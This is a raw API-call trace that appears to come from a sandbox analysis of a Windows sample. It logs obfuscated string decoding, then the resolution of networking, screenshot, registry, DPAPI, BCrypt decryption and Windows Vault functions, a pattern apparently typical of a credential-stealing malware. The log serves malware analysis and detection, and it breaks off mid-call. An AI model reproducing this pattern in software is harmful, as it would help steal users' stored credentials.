pszString="TTC9Z9izRwZuDhLJVuz1dnswOeTFwB3EfOp5UvH+MtPfObrq8VSS/OHZilboW1CDZ4Dmr+0WQagpNYgmBDDTAouxGaSAtAh9ec2/UWDv+1MDoTLfNmbF93NV/N+HGloJVZjwGua+Q4HS+6rJpQHOYGkOI2o=", cchString=0x9c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.286] CryptStringToBinaryA (in: pszString="TTC9Z9izRwZuDhLJVuz1dnswOeTFwB3EfOp5UvH+MtPfObrq8VSS/OHZilboW1CDZ4Dmr+0WQagpNYgmBDDTAouxGaSAtAh9ec2/UWDv+1MDoTLfNmbF93NV/N+HGloJVZjwGua+Q4HS+6rJpQHOYGkOI2o=", cchString=0x9c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.286] CryptStringToBinaryA (in: pszString="SiekZw==", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.286] CryptStringToBinaryA (in: pszString="SiekZw==", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.286] CryptStringToBinaryA (in: pszString="WDS9cd4=", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.287] CryptStringToBinaryA (in: pszString="WDS9cd4=", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.287] CryptStringToBinaryA (in: pszString="X3WFTf2OCyJ9eDXJONqCLiMt", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.287] CryptStringToBinaryA (in: pszString="X3WFTf2OCyJ9eDXJONqCLiMt", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.287] CryptStringToBinaryA (in: pszString="TTC9Z9izRyBAMCO6Pd/NNi48av3/+ySUcvFhRLu3Lt4=", cchString=0x2c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.287] CryptStringToBinaryA (in: pszString="TTC9Z9izRyBAMCO6Pd/NNi48av3/+ySUcvFhRLu3Lt4=", cchString=0x2c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.287] CryptStringToBinaryA (in: pszString="XTatB+i4Qj0PKT7i", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.287] CryptStringToBinaryA (in: pszString="XTatB+i4Qj0PKT7i", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.287] CryptStringToBinaryA (in: pszString="TTC9Z9izRyBAMCPJcsfzOTorLpeN0RHEevZ0X7SxLO3GPvi+8Avt6vzKllbsAxnEbKfvo/4BHtc/IJltal6WX9nkW9LI61o5NIn/DDT3jTFgzHzdKWaNvmJk/MyMDl0=", cchString=0x80, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.287] CryptStringToBinaryA (in: pszString="TTC9Z9izRyBAMCPJcsfzOTorLpeN0RHEevZ0X7SxLO3GPvi+8Avt6vzKllbsAxnEbKfvo/4BHtc/IJltal6WX9nkW9LI61o5NIn/DDT3jTFgzHzdKWaNvmJk/MyMDl0=", cchString=0x80, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.287] CryptStringToBinaryA (in: pszString="XRSDRruJEiNDODSsPQ==", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.287] CryptStringToBinaryA (in: pszString="XRSDRruJEiNDODSsPQ==", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.287] CryptStringToBinaryA (in: pszString="Qhu/Q/aCRyFPfSX3b82Weg==", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.287] CryptStringToBinaryA (in: pszString="Qhu/Q/aCRyFPfSX3b82Weg==", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.287] CryptStringToBinaryA (in: pszString="Qhu0WuuOFS9VNCn4Pc3NLj5jag==", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.288] CryptStringToBinaryA (in: pszString="Qhu0WuuOFS9VNCn4Pc3NLj5jag==", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.288] CryptStringToBinaryA (in: pszString="VhyCVvSVHhIELhmzbofYIi8=", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.288] CryptStringToBinaryA (in: pszString="VhyCVvSVHhIELhmzbofYIi8=", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.288] CryptStringToBinaryA (in: pszString="TTC9Z9izRztTMWbQT+bhei4rJsg=", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.288] CryptStringToBinaryA (in: pszString="TTC9Z9izRztTMWbQT+bhei4rJsg=", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.288] CryptStringToBinaryA (in: pszString="WhqGTPeIBipSAWPlQozfdC8hPg==", cchString=0x1c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.288] CryptStringToBinaryA (in: pszString="WhqGTPeIBipSAWPlQozfdC8hPg==", cchString=0x1c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.288] CryptStringToBinaryA (in: pszString="TTC9Z9izRzpALyHzafbcOy8xZpvZ1QvrZvZ5C7usLd+LNfm99kui7uDJ", cchString=0x38, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.288] CryptStringToBinaryA (in: pszString="TTC9Z9izRzpALyHzafbcOy8xZpvZ1QvrZvZ5C7usLd+LNfm99kui7uDJ", cchString=0x38, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.288] CryptStringToBinaryA (in: pszString="UhqWS/XHIy9VPA==", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.288] CryptStringToBinaryA (in: pszString="UhqWS/XHIy9VPA==", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.288] CryptStringToBinaryA (in: pszString="XRqeSfKCFA==", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.288] CryptStringToBinaryA (in: pszString="XRqeSfKCFA==", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.288] CryptStringToBinaryA (in: pszString="SRCTAt+GEy8=", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.289] CryptStringToBinaryA (in: pszString="SRCTAt+GEy8=", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.289] CryptStringToBinaryA (in: pszString="VhyCVvSVHg==", cchString=0xc, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.289] CryptStringToBinaryA (in: pszString="VhyCVvSVHg==", cchString=0xc, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.289] CryptStringToBinaryA (in: pszString="TTC9Z9izRyZOLjK6PcDfEi8tOvTD2BCYM/R0X7XyYtvYAvOp7VWoo6Tfh1TkBQmHIpb3q/pfEoE9LZ5sFXaxffahROLX2lokIpLiDCM=", cchString=0x68, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.289] CryptStringToBinaryA (in: pszString="TTC9Z9izRyZOLjK6PcDfEi8tOvTD2BCYM/R0X7XyYtvYAvOp7VWoo6Tfh1TkBQmHIpb3q/pfEoE9LZ5sFXaxffahROLX2lokIpLiDCM=", cchString=0x68, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.289] CryptStringToBinaryA (in: pszString="chqWS/WUSSRSMig=", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.289] CryptStringToBinaryA (in: pszString="chqWS/WUSSRSMig=", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.289] CryptStringToBinaryA (in: pszString="eBqDT8iSBSNIKRPEUQ==", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.289] CryptStringToBinaryA (in: pszString="eBqDT8iSBSNIKRPEUQ==", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.289] CryptStringToBinaryA (in: pszString="awaUUPWGCitnNCP6eQ==", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.289] CryptStringToBinaryA (in: pszString="awaUUPWGCitnNCP6eQ==", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.291] CryptStringToBinaryA (in: pszString="exuSUOKXEytFCDXzb8fNNz4=", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.291] CryptStringToBinaryA (in: pszString="exuSUOKXEytFCDXzb8fNNz4=", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.291] CryptStringToBinaryA (in: pszString="exuSUOKXEytFDSflbt7DKD8=", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.291] CryptStringToBinaryA (in: pszString="exuSUOKXEytFDSflbt7DKD8=", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.291] CryptStringToBinaryA (in: pszString="eXWYRg==", cchString=0x8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.291] CryptStringToBinaryA (in: pszString="eXWYRg==", cchString=0x8, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.291] CryptStringToBinaryA (in: pszString="TTC9Z9izRyhIOCryc8jBP3d5PNrBwQyUVdZaZv2zLcj0N/m49U+k/PDVjV0=", cchString=0x3c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.291] CryptStringToBinaryA (in: pszString="TTC9Z9izRyhIOCryc8jBP3d5PNrBwQyUVdZaZv2zLcj0N/m49U+k/PDVjV0=", cchString=0x3c, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.291] CryptStringToBinaryA (in: pszString="TTC9Z9izRztTMWbQT+bhejY2MOTd2AjXdvc=", cchString=0x24, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.291] CryptStringToBinaryA (in: pszString="TTC9Z9izRztTMWbQT+bhejY2MOTd2AjXdvc=", cchString=0x24, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.292] CryptStringToBinaryA (in: pszString="fRqeSfKCFGBSLCr/acw=", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.293] CryptStringToBinaryA (in: pszString="fRqeSfKCFGBSLCr/acw=", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.293] CryptStringToBinaryA (in: pszString="eBqDT/OOFDpOLz+4btjAMy88", cchString=0x18, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.293] CryptStringToBinaryA (in: pszString="eBqDT/OOFDpOLz+4btjAMy88", cchString=0x18, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.293] CryptStringToBinaryA (in: pszString="bhmQQf6UST1QMS/ieA==", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.293] CryptStringToBinaryA (in: pszString="bhmQQf6UST1QMS/ieA==", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.293] CryptStringToBinaryA (in: pszString="QjmeQfqLRx1VPDLz", cchString=0x10, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.293] CryptStringToBinaryA (in: pszString="QjmeQfqLRx1VPDLz", cchString=0x10, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.293] CryptStringToBinaryA (in: pszString="MFutUumIASdNODW4dMfF", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.293] CryptStringToBinaryA (in: pszString="MFutUumIASdNODW4dMfF", cchString=0x14, dwFlags=0x1, pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x19b024, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.293] CryptStringToBinaryA (in: pszString="XU+tcumIZzxAMAL3acjw", cchString=0x14, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x19fe48, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0181.297] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77110000 [0181.298] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x70050000 [0182.426] LoadLibraryA (lpLibFileName="user32.dll") returned 0x755c0000 [0182.426] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x74a50000 [0182.426] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x75a20000 [0182.598] LoadLibraryA (lpLibFileName="psapi.dll") returned 0x74920000 [0182.599] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x73ae0000 [0182.603] LoadLibraryA (lpLibFileName="vaultcli.dll") returned 0x6d3d0000 [0183.627] LoadLibraryA (lpLibFileName="shlwapi.dll") returned 0x74a00000 [0183.628] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75c30000 [0191.352] LoadLibraryA (lpLibFileName="gdiplus.dll") returned 0x6abd0000 [0192.747] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75360000 [0193.179] GetProcAddress (hModule=0x77110000, lpProcName="sscanf") returned 0x7718d950 [0193.179] GetProcAddress (hModule=0x70050000, lpProcName="InternetOpenA") returned 0x701185d0 [0193.179] GetProcAddress (hModule=0x70050000, lpProcName="InternetConnectA") returned 0x70190da0 [0193.179] GetProcAddress (hModule=0x70050000, lpProcName="HttpOpenRequestA") returned 0x701b5860 [0193.179] GetProcAddress (hModule=0x70050000, lpProcName="HttpSendRequestA") returned 0x70118e60 [0193.180] GetProcAddress (hModule=0x70050000, lpProcName="HttpQueryInfoA") returned 0x700f1880 [0193.180] GetProcAddress (hModule=0x70050000, lpProcName="InternetCloseHandle") returned 0x7011d200 [0193.180] GetProcAddress (hModule=0x70050000, lpProcName="InternetReadFile") returned 0x700d7320 [0193.180] GetProcAddress (hModule=0x70050000, lpProcName="InternetSetOptionA") returned 0x700f1dc0 [0193.180] GetProcAddress (hModule=0x70050000, lpProcName="InternetOpenUrlA") returned 0x7009a6c0 [0193.180] GetProcAddress (hModule=0x755c0000, lpProcName="wsprintfA") returned 0x755f04a0 [0193.181] GetProcAddress (hModule=0x755c0000, lpProcName="CharToOemW") returned 0x75642d90 [0193.181] GetProcAddress (hModule=0x755c0000, lpProcName="GetKeyboardLayoutList") returned 0x755f8e70 [0193.181] GetProcAddress (hModule=0x755c0000, lpProcName="EnumDisplayDevicesA") returned 0x755d3250 [0193.181] GetProcAddress (hModule=0x755c0000, lpProcName="ReleaseDC") returned 0x755dba40 [0193.181] GetProcAddress (hModule=0x755c0000, lpProcName="GetDC") returned 0x755f8990 [0193.181] GetProcAddress (hModule=0x755c0000, lpProcName="GetSystemMetrics") returned 0x755d9160 [0193.181] GetProcAddress (hModule=0x755c0000, lpProcName="GetDesktopWindow") returned 0x755d3470 [0193.182] GetProcAddress (hModule=0x755c0000, lpProcName="GetWindowRect") returned 0x755d4140 [0193.182] GetProcAddress (hModule=0x755c0000, lpProcName="GetWindowDC") returned 0x755f8f20 [0193.182] GetProcAddress (hModule=0x755c0000, lpProcName="CloseWindow") returned 0x7561bb50 [0193.182] GetProcAddress (hModule=0x74380000, lpProcName="RegOpenKeyExA") returned 0x7439f790 [0193.182] GetProcAddress (hModule=0x74380000, lpProcName="RegQueryValueExA") returned 0x7439f500 [0193.182] GetProcAddress (hModule=0x74380000, lpProcName="RegCloseKey") returned 0x7439f620 [0193.183] GetProcAddress (hModule=0x74380000, lpProcName="GetCurrentHwProfileA") returned 0x743b3a60 [0193.183] GetProcAddress (hModule=0x74380000, lpProcName="RegEnumKeyExA") returned 0x743a1810 [0193.183] GetProcAddress (hModule=0x74a50000, lpProcName="CreateDCA") returned 0x74ad3d70 [0193.183] GetProcAddress (hModule=0x74a50000, lpProcName="GetDeviceCaps") returned 0x74ad0fe0 [0193.183] GetProcAddress (hModule=0x74a50000, lpProcName="CreateCompatibleDC") returned 0x74ad2050 [0193.183] GetProcAddress (hModule=0x74a50000, lpProcName="CreateCompatibleBitmap") returned 0x74ad2390 [0193.183] GetProcAddress (hModule=0x74a50000, lpProcName="SelectObject") returned 0x74ad0440 [0193.184] GetProcAddress (hModule=0x74a50000, lpProcName="BitBlt") returned 0x74ad2230 [0193.184] GetProcAddress (hModule=0x74a50000, lpProcName="DeleteObject") returned 0x74ad0810 [0193.184] GetProcAddress (hModule=0x74a50000, lpProcName="StretchBlt") returned 0x74aff810 [0193.184] GetProcAddress (hModule=0x74a50000, lpProcName="GetObjectW") returned 0x74ad22e0 [0193.184] GetProcAddress (hModule=0x74a50000, lpProcName="GetDIBits") returned 0x74ad1580 [0193.184] GetProcAddress (hModule=0x74a50000, lpProcName="SaveDC") returned 0x74b06070 [0193.184] GetProcAddress (hModule=0x74a50000, lpProcName="CreateDIBSection") returned 0x74afef00 [0193.185] GetProcAddress (hModule=0x74a50000, lpProcName="DeleteDC") returned 0x74ad0d00 [0193.185] GetProcAddress (hModule=0x74a50000, lpProcName="RestoreDC") returned 0x74b05db0 [0193.185] GetProcAddress (hModule=0x75a20000, lpProcName="DsRoleGetPrimaryDomainInformation") returned 0x6d2f1730 [0193.528] GetProcAddress (hModule=0x74920000, lpProcName="GetModuleFileNameExA") returned 0x74921660 [0193.528] GetProcAddress (hModule=0x74740000, lpProcName="CryptUnprotectData") returned 0x74763140 [0193.528] GetProcAddress (hModule=0x73ae0000, lpProcName="BCryptCloseAlgorithmProvider") returned 0x73ae3c50 [0193.528] GetProcAddress (hModule=0x73ae0000, lpProcName="BCryptDestroyKey") returned 0x73ae6420 [0193.528] GetProcAddress (hModule=0x73ae0000, lpProcName="BCryptOpenAlgorithmProvider") returned 0x73ae3760 [0193.528] GetProcAddress (hModule=0x73ae0000, lpProcName="BCryptSetProperty") returned 0x73ae47e0 [0193.529] GetProcAddress (hModule=0x73ae0000, lpProcName="BCryptGenerateSymmetricKey") returned 0x73ae4910 [0193.529] GetProcAddress (hModule=0x73ae0000, lpProcName="BCryptDecrypt") returned 0x73ae4ff0 [0193.529] GetProcAddress (hModule=0x6d3d0000, lpProcName="VaultOpenVault") returned 0x6d3dbc10 [0193.529] GetProcAddress (hModule=0x6d3d0000, lpProcName="VaultCloseVault") returned 0x6d3dbc90 [0193.529] GetProcAddress (hModule=0x6d3d0000, lpProcName="VaultEnumerateItems") returned 0x6d3db960 [0193.529] GetProcAddress (hModule=0x6d3d0000, lpProcName="VaultGetItemWin8") returned 0x0 [0193.529] GetProcAddress (hModule=0x6d3d0000, lpProcName="VaultGetItemWin7") returned 0x0 [0193.530] GetProcAddress (hModule=0x6d3d0000, lpProcName="VaultFree") returned 0x6d3e7050 [0193.530] GetProcAddress (hModule=0x74a00000, lpProcName="StrCmpCA") returned 0x74a23330 [0193.530] GetProcAddress (hModule=0x74a00000, lpProcName="StrStrA") returned 0x74a23570 [0193.530] GetProcAddress (hModule=0x74a00000, lpProcName="PathMatchSpecA") returned 0x74a22c20 [0193.530] GetProcAddress (hModule=0x75c30000, lpProcName="SHGetFolderPathA") returned 0x75de9b10 [0193.530] GetProcAddress (hModule=0x75c30000, lpProcName="ShellExecuteExA") returned 